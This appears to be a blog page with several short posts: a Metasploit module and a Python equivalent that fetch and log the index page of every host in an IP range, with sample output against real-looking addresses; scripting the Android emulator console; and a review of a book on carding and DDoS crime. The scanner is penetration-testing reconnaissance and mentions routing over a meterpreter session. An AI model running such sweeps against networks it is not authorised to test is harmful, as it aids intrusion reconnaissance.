I opted to write something that would scan a range, perform an HTTP GET of / on each IP, then take the resulting body from the response, which should be HTML, and save it to a file to look at afterwards.

Looks like this when it runs...

msf auxiliary(http_index_grabber) > set RHOSTS carnal0wnage.com/24
RHOSTS => carnal0wnage.com/24
msf auxiliary(http_index_grabber) > run
[+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/209.20.85.4_20100904.4426.html
[+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/209.20.85.5_20100904.4429.html
[*] Received 301 to http://drumsti.cc/ for 209.20.85.10:80/
[-] Received 403 for 209.20.85.8:80/
[+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/209.20.85.12_20100904.4432.html
...
[*] Received 302 to http://209.20.85.57/apache2-default/ for 209.20.85.57:80/
[+] Received a HTTP 200...Logging to file: /home/cg/.msf3/logs/auxiliary/http_index_grabber/209.20.85.56_20100904.4503.html
[*] Received 302 to http://209.20.85.51/session/new for 209.20.85.51:80/
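Outside the framework, the per-host logic is easy to sketch. A rough standalone Python equivalent (the `grab_index` helper and its log-file naming are my own approximation of the module's behavior, not its actual code):

```python
# Standalone sketch of what http_index_grabber does per host: GET /,
# log a 200 body to a timestamped file, report redirects and errors.
import time
import urllib.error
import urllib.request
from pathlib import Path

class NoRedirect(urllib.request.HTTPRedirectHandler):
    # Report 301/302 targets instead of silently following them,
    # like the module's output does.
    def redirect_request(self, *args, **kwargs):
        return None

def grab_index(host, port=80, log_dir="index_logs"):
    url = f"http://{host}:{port}/"
    opener = urllib.request.build_opener(NoRedirect)
    try:
        resp = opener.open(url, timeout=10)
    except urllib.error.HTTPError as e:
        if e.code in (301, 302):
            return f"Received {e.code} to {e.headers.get('Location')} for {host}:{port}/"
        return f"Received {e.code} for {host}:{port}/"
    body = resp.read()
    Path(log_dir).mkdir(parents=True, exist_ok=True)
    stamp = time.strftime("%Y%m%d.%H%M%S")
    out = Path(log_dir) / f"{host}_{stamp}.html"
    out.write_bytes(body)
    return f"Received a HTTP 200...Logging to file: {out}"
```

In the real module the request rides over the meterpreter route you've already set up; this sketch just talks straight to the target.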

A poster on one of the other Android posts mentioned you can just telnet into the Android emulator if you've got it running. It's easy to do and the preferred way if you just want to script events. Just telnet into localhost 5554 and you can issue emulator commands.

user@dev:~$ telnet localhost 5554
Trying ::1...
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Android Console: type 'help' for a list of commands
OK
help
Android console command help:
    help|h|?    print a list of commands
    event       simulate hardware events
    geo         Geo-location commands
    gsm         GSM related commands
    kill        kill the emulator instance
    network     manage network settings
    power       power related commands
    quit|exit   quit control session
    redir       manage port redirections
    sms         SMS related commands
    avd         manager virtual device state
    window      manage emulator window
OK
help event
allows you to send fake hardware events to the kernel
available sub-commands:
    event send    send a series of events to the kernel
    event types   list all type aliases
    event codes   list all code aliases for a given type
    event text    simulate keystrokes from a given text
OK
help geo
allows you to change Geo-related settings, or to send GPS NMEA sentences
available sub-commands:
    geo nmea    send an GPS NMEA sentence
    geo fix     send a simple GPS fix
OK

you get the idea...
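If you'd rather script it than type into telnet, the same session works over a plain socket. A minimal sketch, assuming the default console port 5554 for the first emulator instance (`send_console_cmd` and `_read_until_status` are my own helper names):

```python
# Script the Android emulator console with a plain socket instead of
# an interactive telnet session: read the banner, send a command,
# read the reply. Port 5554 is the first emulator's default console port.
import socket

def _read_until_status(sock):
    # The console terminates each response with "OK" or "KO: <reason>".
    data = b""
    while b"OK\r\n" not in data and b"KO" not in data:
        chunk = sock.recv(1024)
        if not chunk:
            break
        data += chunk
    return data.decode(errors="replace")

def send_console_cmd(cmd, host="127.0.0.1", port=5554):
    with socket.create_connection((host, port), timeout=5) as s:
        _read_until_status(s)            # swallow the banner
        s.sendall((cmd + "\n").encode())
        return _read_until_status(s)

# e.g.: send_console_cmd("geo fix -122.4194 37.7749")
#       send_console_cmd("sms send 5551212 hello from the console")
```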

Fatal System Error: The Hunt for the New Crime Lords Who are Bringing Down the Internet

Pseudo book review, since it's not "really" a tech book. The book is written with very little technical jargon and is an interesting read, mixing the story of Barrett Lyon, who fought DDoS attacks against various websites, and the ties between online gambling and the mob, with a transition into the fight by Andy Crocker, a British cybersecurity agent, against the Russian and Eastern Bloc carding cybercriminals. An entertaining read about the history of carding and denial-of-service attacks by Eastern Bloc criminals.